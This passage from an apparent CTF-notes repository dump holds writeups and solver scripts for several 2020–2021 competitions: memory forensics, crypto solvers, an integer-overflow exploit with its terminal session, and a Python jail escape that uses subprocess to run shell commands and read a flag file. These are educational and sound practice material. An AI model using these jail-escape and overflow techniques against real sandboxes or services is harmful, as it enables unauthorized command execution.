| strings | 100 | 328 |\n| Misc | [Dragon](Dragon) | image forensics | 100 | 394 |\n| Misc | [Encrypted the flag I have](Encrypted_the_flag_I_have) | font, Gonk Droid Medium | 100 | 352 |\n| Misc | [Extraterrestrial Communication](Extraterrestrial_Communication) | SSTV | 200 | 166 |\n| Misc | [Hidden message](Hidden_message) | image, embed data | 100 | 345 |\n| Crypto | [Julius' ancient script](Julius_ancient_script) | ROT | 100 | 352 |\n| Crypto | [Just Take Your Time](Just_Take_Your_Time) | DES3, fixed iv | 200 | 135 |\n| Misc | [Leak Spin](Leak_Spin) | OSINT? | 100 | 298 |\n| Web | [Simple web](Simple_web) | DevTools | 100 | 864 |\n| Crypto | [This one is really basic](This_one_is_really_basic) | Base64 | 300 | 242 |\n| Web | [Very secure website](Very_secure_website) | PHP, magic hash | 200 | 399 |\n\n---\n\n## Result\n\n* 1950 points\n\n* 189 / 1084 (> 1 pt)\n" }, { "alpha_fraction": 0.6756756901741028, "alphanum_fraction": 0.7550675868988037, "avg_line_length": 33.882354736328125, "blob_id": "d4f6a18b3c708301902028e0d9556311d4efba83", "content_id": "96b8d326f2a5408cb036f241addf67f5831b140e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "no_license", "max_line_length": 218, "num_lines": 17, "path": "/2021/UMassCTF_2021/notes/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nVolatilityを使って.memファイルを解析する。\n\nヒントによると、メモ帳に表示されている文字が怪しそうなので、以下のコマンドを実行し`notepad.exe`を解析する。\n\n```bash\n$ vol.py -f image.mem imageinfo\n$ vol.py -f image.mem --kdbg=0xf80002a3b0a0 --profile=Win7SP1x64 pstree\n$ vol.py -f image.mem --kdbg=0xf80002a3b0a0 --profile=Win7SP1x64 memdump -D ./ -p 2696\n$ strings -e l 2696.dmp | grep \"UMASS\"\nUMASS{$3CUR3_$70Rag3}\n```\n\n[参考]\n\n* [Volatility tips: how to extract text typed in a notepad window from a Windows memory dump](https://www.andreafortuna.org/2018/03/02/volatility-tips-extract-text-typed-in-a-notepad-window-from-a-windows-memory-dump/)" }, { "alpha_fraction": 0.6269350051879883, "alphanum_fraction": 0.6517027616500854, "avg_line_length": 23.846153259277344, "blob_id": "dfc57d11740144d31b9a96fbdd297e47450bf2ec", "content_id": "794de5196885dd5c010aa329ccd681c101171ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 646, "license_type": "no_license", "max_line_length": 72, "num_lines": 26, "path": "/2021/BCACTF_2.0/FNES_1/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\ncontext.log_level = 'error'\n\ntarget_query = \"Open sesame... Flag please!\"\n\n# 1\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('E')\nio.recvuntil('>>> ')\nc = '\\x00' * len(target_query)\nio.sendline(c)\nio.recvuntil(\"Here's your message:\\n\")\nmsg = io.recvline().strip().decode('utf-8')\n\n# 2\nio = remote('crypto.bcactf.com', '49153')\nio.recvuntil('Would you like to encrypt (E), decrypt (D), or quit (Q)?')\nio.sendline('D')\nio.recvuntil('>>> ')\nc = xor(bytes.fromhex(msg), target_query.encode('utf-8')).hex()\nio.sendline(c)\n\nio.interactive()\n\nio.close()\n" }, { "alpha_fraction": 0.7448979616165161, "alphanum_fraction": 0.7448979616165161, "avg_line_length": 23.5, "blob_id": "b8beff8682197b47007d7a84daf0613d5807c126", "content_id": "0e1febf6b89cda79d92fcabbdf381c5dd0332e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "no_license", "max_line_length": 62, "num_lines": 4, "path": "/2021/HeroCTF_v3/Record/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you find anything special about this domain `heroctf.fr` ?\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.4991273880004883, "alphanum_fraction": 0.6541011929512024, "avg_line_length": 50.16071319580078, "blob_id": "340ab9fe5e149ace713a35dc5ce2ed6ab05cf2a7", "content_id": "98ec5b5b1a292b467549add231e2e73ef5d06e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3017, "license_type": "no_license", "max_line_length": 1295, "num_lines": 56, "path": "/2021/BCACTF_2.0/Countdown_Timer/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49154/ にアクセスする。\n\n[Start Countdown]ボタンを押すと、カウントダウンが始まる。\n\n![](img/2021-06-13-13-16-11.png)\n\nページのソースを見るとJavaScriptが書かれていた。\n\n```js\n<script type=\"text/javascript\">\n var time = 100000;\n var minTime = 100;\n var daysInput = document.getElementById(\"countdownDays\");\n var counter;\n document.getElementById(\"startButton\").onclick = function () {\n startCountDown();\n };\n document.getElementById(\"minTimeHeader\").innerHTML = \"Minimum Time: \" + minTime + \" days\";\n\n daysInput.min = minTime;\n\n function startCountDown() {\n clearInterval(counter);\n if (daysInput.value < minTime) {\n daysInput.value = minTime;\n }\n time = daysInput.value * 24 * 60 * 60;\n counter = setInterval(countdown, 1000);\n }\n\n function countdown() {\n time -= 1;\n if (time <= 0) {\n getFlag();\n clearInterval(counter);\n return;\n }\n var numdays = Math.floor(time / 86400);\n var numhours = Math.floor((time % 86400) / 3600);\n var numminutes = Math.floor(((time % 86400) % 3600) / 60);\n var numseconds = ((time % 86400) % 3600) % 60;\n document.getElementById(\"remainingTime\").innerHTML = numdays + \" Days \" + numhours + \" Hours \" + numminutes + \" Minutes \" + numseconds + \" Seconds\";\n }\n \n //This is not part of the intended solve path, ignore this\n function getFlag() {\n var _0x2636=['atob','5117oZMdEn','then','VjIxak9WQlJQVDA9','Time\\x20is\\x20up!\\x20Flag:\\x20','text','2myDwax','80990TIAiao','159475uJlWpn','486144SCONMd','1ZGbuyJ','70599pvkkee','getElementById','39313hGSvrt','remainingTime','2ryZPVf','1AonKEy','133880SpkfyF'];function _0x91fe(_0x432e25,_0x1d1f40){_0x432e25=_0x432e25-0x199;var _0x26367c=_0x2636[_0x432e25];return _0x26367c;}var _0x54df47=_0x91fe;(function(_0x5ee5d0,_0x1eb0fc){var _0x3fc014=_0x91fe;while(!![]){try{var _0x1bb0d9=parseInt(_0x3fc014(0x1a9))+parseInt(_0x3fc014(0x19d))*parseInt(_0x3fc014(0x19b))+parseInt(_0x3fc014(0x1a6))+parseInt(_0x3fc014(0x19f))*-parseInt(_0x3fc014(0x19c))+-parseInt(_0x3fc014(0x1a8))*-parseInt(_0x3fc014(0x1a5))+-parseInt(_0x3fc014(0x199))*-parseInt(_0x3fc014(0x1a4))+-parseInt(_0x3fc014(0x1a7));if(_0x1bb0d9===_0x1eb0fc)break;else _0x5ee5d0['push'](_0x5ee5d0['shift']());}catch(_0x27a98){_0x5ee5d0['push'](_0x5ee5d0['shift']());}}}(_0x2636,0x2892d),fetch('/'+window['atob'](window[_0x54df47(0x19e)](window[_0x54df47(0x19e)](window['atob'](window['btoa'](window['atob'](_0x54df47(0x1a1))))))))[_0x54df47(0x1a0)](_0x192f21=>_0x192f21[_0x54df47(0x1a3)]())['then'](_0x1b849e=>{var _0xbb5c79=_0x54df47;time<=0x0&&(document[_0xbb5c79(0x1aa)](_0xbb5c79(0x19a))['innerHTML']=_0xbb5c79(0x1a2)+_0x1b849e);}));\n }\n</script>\n```\n\n開発者ツールのコンソールで`time = 0;`と入力するとフラグが表示された。\n\n<!-- bcactf{1_tH1nK_tH3_CtF_w0u1D_b3_0v3r_bY_1O0_dAy5} -->\n" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7580246925354004, "avg_line_length": 15.199999809265137, "blob_id": "33475995849d6495ba8fd1f4f6df7e7feb863109", "content_id": "70429a2f99bfd19d82c128f3557ca7d566f7d224", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 549, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/2021/WaniCTF21-spring/01_netcat/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "```\nnc netcat.pwn.wanictf.org 9001\n```\n\n* netcat (nc)と呼ばれるコマンドを使うだけです。\n\n* つないだら何も出力されなくても知っているコマンドを打ってみましょう。\n\n使用ツール例\n\n* netcat (nc)\n\ngccのセキュリティ保護\n\n* Full RELocation ReadOnly (RELRO)\n\n* Stack Smash Protection (SSP)有効\n\n* No eXecute bit(NX)有効\n\n* Position Independent Executable (PIE)有効\n\n[pwn-01-netcat.zip](https://score.wanictf.org/storage/3zjr6y6vpfzfc66zmwxh9nr6b2eoyf6p/pwn-01-netcat.zip)\n\nWriter : saru\n" }, { "alpha_fraction": 0.6518987417221069, "alphanum_fraction": 0.7594936490058899, "avg_line_length": 30.799999237060547, "blob_id": "d9ceea82e21fb22d2716a4e42b3d8b9323c5e93d", "content_id": "ec4f207812bfd99cbeeac82eaf1a12af4422cc4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 158, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2020/kksctf_open_2020/bson/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "This is the last time i'm asking, who the f is bson??\n\n[bson.json](https://tasks.kksctf.ru/tasks/183dd9ea-3d9f-4fd7-815d-b91cd1a57ef4/bson.json)\n\n@anfinogenov" }, { "alpha_fraction": 0.2857142984867096, "alphanum_fraction": 0.46560847759246826, "avg_line_length": 18, "blob_id": "9b4a2a17a81bcfb5c5993f96f2d939e4f396b6dc", "content_id": "7454f88d71600d54186fbc1291834d44e2b68956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/2020/CyberSecurityRumble2020/Hashfun/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "digest = [10, 30, 31, 62, 27, 9, 4, 0, 1, 1, 4, 4, 7, 13, 8, 12, 21, 28, 12, 6, 60]\nchar = 'CSR{'\n\ni = 0\nfor d in digest:\n x = chr(d ^ ord(char[i]))\n char += x\n i += 1\n\nprint(char)" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 30.399999618530273, "blob_id": "2cd9d69c10c6f3a3b1e37faca570cff7ab70f82a", "content_id": "27c6d4e24bb1bc26e62ff965c663555c8285ea08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 86, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Hashfun/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I guess there is no way to recover the flag.\n\n[Files](https://storage.googleapis.com/ctf.cybersecurityrumble.de/hashfun/generate.py)\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6711409687995911, "alphanum_fraction": 0.7114093899726868, "avg_line_length": 36.5, "blob_id": "ce9eecd36b8b06aaf0f9fc04e48796fea3893cbd", "content_id": "b3097abbddf76a3a93a914cc513baf4e29a101f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 88, "num_lines": 4, "path": "/2021/Zh3r0_CTF_V2/bxxs/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We've made some new epic updates to our website. Could you send us some feedback on it ?\n\n⬇️ link - [bxxs](http://web.zh3r0.cf:3333/)\nAuthor - ZyperX" }, { "alpha_fraction": 0.6009615659713745, "alphanum_fraction": 0.7403846383094788, "avg_line_length": 18, "blob_id": "cc125cc82539ea5ea1ff2f0eb4ced46abb9ddccb", "content_id": "d07271e708df98e36f568a624322e4198f115172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/2021/UMassCTF_2021/ekrpat/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I made so few errors when creating this jail.\n\nnc 34.72.64.224 8083\n\nnc 35.231.20.75 8083\n\nCreated by Thomas (Seltzerz #6678)\n\n<details><summary>View Hint</summary>\nLook down at where you're typing.\n</details>" }, { "alpha_fraction": 0.31308412551879883, "alphanum_fraction": 0.44859811663627625, "avg_line_length": 16.83333396911621, "blob_id": "5849f64e6a0649381111a68cd644f06a654688c2", "content_id": "b15766e46d84ea87deaa4bd849a385374e919882", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 430, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/2021/WeCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WeCTF 2021\n\n* https://21.wectf.io/\n\n * https://github.com/wectf/2021\n\n* 2021/06/20 02:00 JST — 2021/06/21 02:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --- | ------------------ | ------- | ----: | -----: |\n| Web | [CSP 1](CSP_1) | CSP | 335 | 133 |\n| Web | [Include](Include) | LFI | 310 | 395 |\n\n---\n\n## Result\n\n* 664 points\n\n* 147 / 574 (> 1 pt)\n" }, { "alpha_fraction": 0.6096033453941345, "alphanum_fraction": 0.630480170249939, "avg_line_length": 22.950000762939453, "blob_id": "a1488963487302b984bdc8f23a23b9c3b4437130", "content_id": "bdbcdcea6ba783a8462e1d98555034c38074e4e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 595, "license_type": "no_license", "max_line_length": 137, "num_lines": 20, "path": "/2021/UIUCTF_2021/phpfuck/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://phpfuck.chal.uiuc.tf にアクセスする。\n\n`show_source(__FILE__)`と`phpinfo()`が実行されている。\n\n```php\n<?php\n// Flag is inside ./flag.php :)\n($x=str_replace(\"`\",\"\",strval($_REQUEST[\"x\"])))&&strlen(count_chars($x,3))<=5?print(eval(\"return $x;\")):show_source(__FILE__)&&phpinfo();\n```\n\n`./flag.php`があると書いてあるので、http://phpfuck.chal.uiuc.tf/flag.php にアクセスしてソースコードを見るとフラグが書かれていた。\n\n```\n<? /* uiuctf{pl3as3_n0_m0rE_pHpee} */ ?>\nNo flag for you!\n```\n\n<!-- uiuctf{pl3as3_n0_m0rE_pHpee} -->\n" }, { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7232142686843872, "avg_line_length": 19.363636016845703, "blob_id": "b65fa5309844d47f43ac457952dccf6dae857c52", "content_id": "849e24f1d5db02b30c446b49cbe12badc4e9a7e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 224, "license_type": "no_license", "max_line_length": 119, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Formatting/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWait, I thought format strings were only in C???\n\n**Attachments**\n\n[https://imaginaryctf.org/r/14BD-stonks.py](https://imaginaryctf.org/r/14BD-stonks.py) `nc chal.imaginaryctf.org 42014`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.7218543291091919, "alphanum_fraction": 0.7549669146537781, "avg_line_length": 24.16666603088379, "blob_id": "e78570caef4b397d4f3b34aee3cbab7e51a3c9e3", "content_id": "ed288380e4176071c2ab8e990072398c3928e163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 151, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/2021/HeroCTF_v3/PwnQL_#2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Extract the admin's password from the database.\n\nURL : http://chall1.heroctf.fr:8080 (same URL than before)\n\nFormat : Hero{password}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.6272401213645935, "alphanum_fraction": 0.8100358247756958, "avg_line_length": 54.79999923706055, "blob_id": "4c8ff2641619be734ece4066eec978ee1b267e5c", "content_id": "b3db5209dfc92a3e2d20bffb212c770cd7ff71f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 279, "license_type": "no_license", "max_line_length": 112, "num_lines": 5, "path": "/2021/RaRCTF_2021/sRSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "we have created the securest possible rsa algorithm!\n\n[script.py - c68522](https://files-ctf.rars.win/challenge-files/43/c685225e786d1ecc9b7a60ec0205eb43/script.py)\n\n[output.txt - 2d9d04](https://files-ctf.rars.win/challenge-files/43/2d9d04a8ed03feea0c2d29a7c034452f/output.txt)\n" }, { "alpha_fraction": 0.4329896867275238, "alphanum_fraction": 0.45618557929992676, "avg_line_length": 18.450000762939453, "blob_id": "dff8b0efa55cad942495e485fcbe02e61a05e549", "content_id": "0dcfc85145f3d11e7baf8a9694568f202060c71a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 60, "num_lines": 20, "path": "/2021/BCACTF_2.0/Cipher_Mishap/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import string\n\nUPPER = string.ascii_uppercase * 2\n\nl = open('text.txt','r').read().replace('\\n','').split(', ')\n\nplain = ''\nfor s in l:\n ss = s.split('-')\n c = chr(int(ss[0],8))\n if(len(ss) == 2):\n c = UPPER[UPPER.find(c) + 23] # ROT23\n if(ss[1] == 'Y'):\n plain += c\n else:\n plain += c.lower()\n else:\n plain += c\n\nprint(plain)" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.7301587462425232, "avg_line_length": 11.600000381469727, "blob_id": "9f8e74ca06ab0fbff85d29710710c070e6cd2b7f", "content_id": "4b1d7cbdbaa40b325c85637a19c6295c92e53362", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 63, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Sessions/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Find the flag.\n\nhttp://34.69.61.54:4777\n\nAuthor: f1rehaz4rd\n" }, { "alpha_fraction": 0.7719298005104065, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 33.400001525878906, "blob_id": "15e1d916561110edc125f581f092564909753c55", "content_id": "8812184a7ed394954d13d0f1e849b36f69b31d20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 171, "license_type": "no_license", "max_line_length": 122, "num_lines": 5, "path": "/2020/pbctf_2020/Sploosh/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I wanted to make my own URL scraper, but parsing HTML is hard, so I used some random open source scraping project instead.\n\nhttp://sploosh.chal.perfect.blue/\n\nBy: Corb3nik" }, { "alpha_fraction": 0.756302535533905, "alphanum_fraction": 0.767507016658783, "avg_line_length": 70.5999984741211, "blob_id": "83d7c96ed19469aa94d7967afae5d5da06593949", "content_id": "f3a946b84df164c2e1b292a07ee35efa702cf854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 243, "num_lines": 5, "path": "/2020/CyberSecurityRumble2020/Wheels_n_Whales/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I've heard that [whales and wheels](http://chal.cybersecurityrumble.de:7780/) are the new hot thing. So a buddy of mine build a website where you can get your own. I think he hid an easter egg somewhere, but I can't get to it, can you help me?\n\n[web.py](https://storage.googleapis.com/ctf.cybersecurityrumble.de/wheelsnwhales/web.py)\n\nAuthor: gina|RedRocket" }, { "alpha_fraction": 0.47783148288726807, "alphanum_fraction": 0.5043076276779175, "avg_line_length": 26.350574493408203, "blob_id": "e91ac8a6f86e22bb4dabb9af1176864a63fa2c5a", "content_id": "d6a72b3c6ce7c26e2efd710e6bd945fc75ad7d74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4962, "license_type": "no_license", "max_line_length": 101, "num_lines": 174, "path": "/2021/BCACTF_2.0/BCA_Mart/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムとそのバイナリが与えられる。\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n\nint money = 15;\n\nint purchase(char *item, int cost) {\n int amount;\n printf(\"How many %s would you like to buy?\\n\", item);\n printf(\"> \");\n scanf(\"%d\", &amount);\n\n if (amount > 0) {\n cost *= amount;\n printf(\"That'll cost $%d.\\n\", cost);\n if (cost <= money) {\n puts(\"Thanks for your purchse!\");\n money -= cost;\n } else {\n puts(\"Sorry, but you don't have enough money.\");\n puts(\"Sucks to be you I guess.\");\n amount = 0;\n }\n } else {\n puts(\"I'm sorry, but we don't put up with pranksters.\");\n puts(\"Please buy something or leave.\");\n }\n\n return amount;\n}\n\nint main() {\n int input;\n\n setbuf(stdout, NULL);\n setbuf(stdin, NULL);\n setbuf(stderr, NULL);\n\n puts(\"Welcome to BCA MART!\");\n puts(\"We have tons of snacks available for purchase.\");\n puts(\"(Please ignore the fact we charge a markup on everything)\");\n\n while (1) {\n puts(\"\");\n puts(\"1) Hichew™: $2.00\");\n puts(\"2) Lays® Potato Chips: $2.00\");\n puts(\"3) Water in a Bottle: $1.00\");\n puts(\"4) Not Water© in a Bottle: $2.00\");\n puts(\"5) BCA© school merch: $20.00\");\n puts(\"6) Flag: $100.00\");\n puts(\"0) Leave\");\n puts(\"\");\n printf(\"You currently have $%d.\\n\", money);\n puts(\"What would you like to buy?\");\n\n printf(\"> \");\n scanf(\"%d\", &input);\n\n switch (input) {\n case 0:\n puts(\"Goodbye!\");\n puts(\"Come back soon!\");\n puts(\"Obviously, to spend more money :)\");\n return 0;\n case 1:\n purchase(\"fruity pieces of goodness\", 2);\n break;\n case 2:\n purchase(\"b̶a̶g̶s̶ ̶o̶f̶ ̶a̶i̶r̶ potato chips\", 2);\n break;\n case 3:\n purchase(\"bottles of tap water\", 1);\n break;\n case 4:\n purchase(\"generic carbonated beverages\", 2);\n break;\n case 5:\n purchase(\"wonderfully-designed t-shirts\", 20);\n break;\n case 6:\n if (purchase(\"super-cool ctf flags\", 100) > 0) {\n FILE *fp = fopen(\"flag.txt\", \"r\");\n char flag[100];\n\n if (fp == NULL) {\n puts(\"Hmm, I can't open our flag.txt file.\");\n puts(\"Sorry, but looks like we're all out of flags.\");\n puts(\"Out of luck, we just sold our last one a couple mintues ago.\");\n puts(\"[If you are seeing this on the remote server, please contact admin].\");\n exit(1);\n }\n\n fgets(flag, sizeof(flag), fp);\n puts(flag);\n }\n break;\n default:\n puts(\"Sorry, please select a valid option.\");\n }\n }\n}\n```\n\n`6`を入力して`purchase`に成功すればフラグを入手できる。\n\n```\ncase 6:\n if (purchase(\"super-cool ctf flags\", 100) > 0) {\n FILE *fp = fopen(\"flag.txt\", \"r\");\n char flag[100];\n\n if (fp == NULL) {\n puts(\"Hmm, I can't open our flag.txt file.\");\n puts(\"Sorry, but looks like we're all out of flags.\");\n puts(\"Out of luck, we just sold our last one a couple mintues ago.\");\n puts(\"[If you are seeing this on the remote server, please contact admin].\");\n exit(1);\n }\n\n fgets(flag, sizeof(flag), fp);\n puts(flag);\n }\n break;\n```\n\n`purchase`内の`cost *= amount;`で、桁あふれが起きて`cost`が負になるような大きな`amount`を与えればよい。\n\n```\nscanf(\"%d\", &amount);\n\nif (amount > 0) {\n cost *= amount;\n printf(\"That'll cost $%d.\\n\", cost);\n if (cost <= money) {\n puts(\"Thanks for your purchse!\");\n money -= cost;\n } else {\n puts(\"Sorry, but you don't have enough money.\");\n puts(\"Sucks to be you I guess.\");\n amount = 0;\n }\n```\n\nintの最大値`2147483647`を入力したらうまくいった。\n\n```\n$ nc bin.bcactf.com 49153\nWelcome to BCA MART!\nWe have tons of snacks available for purchase.\n(Please ignore the fact we charge a markup on everything)\n\n1) Hichew™: $2.00\n2) Lays® Potato Chips: $2.00\n3) Water in a Bottle: $1.00\n4) Not Water© in a Bottle: $2.00\n5) BCA© school merch: $20.00\n6) Flag: $100.00\n0) Leave\n\nYou currently have $15.\nWhat would you like to buy?\n> 6\nHow many super-cool ctf flags would you like to buy?\n> 2147483647\nThat'll cost $-100.\nThanks for your purchse!\nbcactf{bca_store??_wdym_ive_never_heard_of_that_one_before}\n```\n\n<!-- bcactf{bca_store??_wdym_ive_never_heard_of_that_one_before} -->\n" }, { "alpha_fraction": 0.7285714149475098, "alphanum_fraction": 0.738095223903656, "avg_line_length": 18.18181800842285, "blob_id": "9f59e358b573ab6b4e741c988e8cdada2313a0e0", "content_id": "fee14dc43466d9965b2e98a90c823a0dc7876d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 210, "license_type": "no_license", "max_line_length": 83, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Roos_World/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nSomebody hid Roo's flag on his website. Roo really needs some help.\n\n**Attachments**\n\n[http://roos-world.chal.imaginaryctf.org](http://roos-world.chal.imaginaryctf.org/)\n\n**Author**\n\nFIREPONY57" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.5426900386810303, "avg_line_length": 26.612903594970703, "blob_id": "4f891e4c7ceb30f745690f02ed241a96e8c98768", "content_id": "d41d929ddd43f4c628003c607e07d7a52624d9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 57, "num_lines": 31, "path": "/2021/WaniCTF21-spring/Automaton_Lab/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nrule = {'111':'0', '110':'0', '101':'0', '100':'1', \n '011':'1', '010':'1', '001':'1', '000':'0'}\n\ndef rule30(state, gen):\n # Found Gen(46) = Gen(1501)\n if gen > 1500:\n gen = gen % 1455\n for _ in range(gen):\n next_state = \"\"\n state = state[-1] + state + state[0]\n for i in range(15):\n next_state += rule[state[i:i+3]]\n state = next_state\n return state\n\nio = remote('automaton.mis.wanictf.org','50020')\nio.recvuntil('(press enter key to continue)')\nio.sendline()\nfor _ in range(3):\n io.recvuntil('= ')\n init = io.recvline().decode('utf-8').replace('\\n','')\n io.recvuntil('= ')\n gen = int(io.recvline().decode('utf-8'))\n print(rule30(init,gen))\n io.recvuntil('> ')\n io.sendline(rule30(init,gen))\n print(io.recvline())\nprint(io.recvline())\nio.close()" }, { "alpha_fraction": 0.7756410241127014, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 30.200000762939453, "blob_id": "d82dc29d750ac30e8501afd82f0be72e1e01ba3e", "content_id": "03efaadf922478ba411a57c9475ede446faae3ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 192, "license_type": "no_license", "max_line_length": 111, "num_lines": 5, "path": "/2021/WaniCTF21-spring/presentation/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "このままじゃFLAGをプレゼンできない...\n\n[for-presentation.zip](https://score.wanictf.org/storage/bsfrfq7m02rxxquxdbd98mmvl3rlf8r7/for-presentation.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.6855624318122864, "alphanum_fraction": 0.6997342705726624, "avg_line_length": 27.25, "blob_id": "e6a94e0d5aad195ce5d3abae946509db501a6e17", "content_id": "502190346ef4281f21cbe5c35b60ae676a2c64a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1423, "license_type": "no_license", "max_line_length": 207, "num_lines": 40, "path": "/2021/UMassCTF_2021/ekrpat/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`nc`コマンドを実行すると以下のメッセージが表示される。\n\n```\nFrg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv\n```\n\n問題タイトルの`ekrpat`で調べると、次のキーボード画像が見つかった。\n\n![](img/2021-03-28-18-57-49.png)\n\nこれは、**Dvorak配列**とよばれるキー配列だということが分かった。\n\n以下のサイトを使って変換してみる。\n\n* https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard\n\n```\nYou've broken my code! Escape without the help of eval, exec, import, open, os, read, system, and write. First, enter 'dvorak'. You will then get another input which you can use try to break out of the jail.\n```\n\ndvorakと入力した後、Pythonプログラムが実行できる。上のメッセージにも書いてある通り`eval`や`exec`等が使えないので工夫する。\n\n```bash\n>>> dvorak\n>>> __import__('subprocess').call('dir',shell=True); \nDockerfile ekrpat.py flag ojal. ynetd\nDockerfile ekrpat.py flag ojal. ynetd\nPlay by the rules!!! Try again.\n\n>>> dvorak\n>>> __import__('subprocess').call('cat\\x20flag',shell=True);print('hoge');\nUMASS{dvorak_rules}\nUMASS{dvorak_rules}\nhoge\nhoge\n```\n\n<!-- UMASS{dvorak_rules} -->" }, { "alpha_fraction": 0.7024608254432678, "alphanum_fraction": 0.8143176436424255, "avg_line_length": 39.727272033691406, "blob_id": "193a0ad7085f63347fb50ee1b5daea787b3ffa67", "content_id": "4039a95d68827f8b160b2ea9a68d5fc5c03f821d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 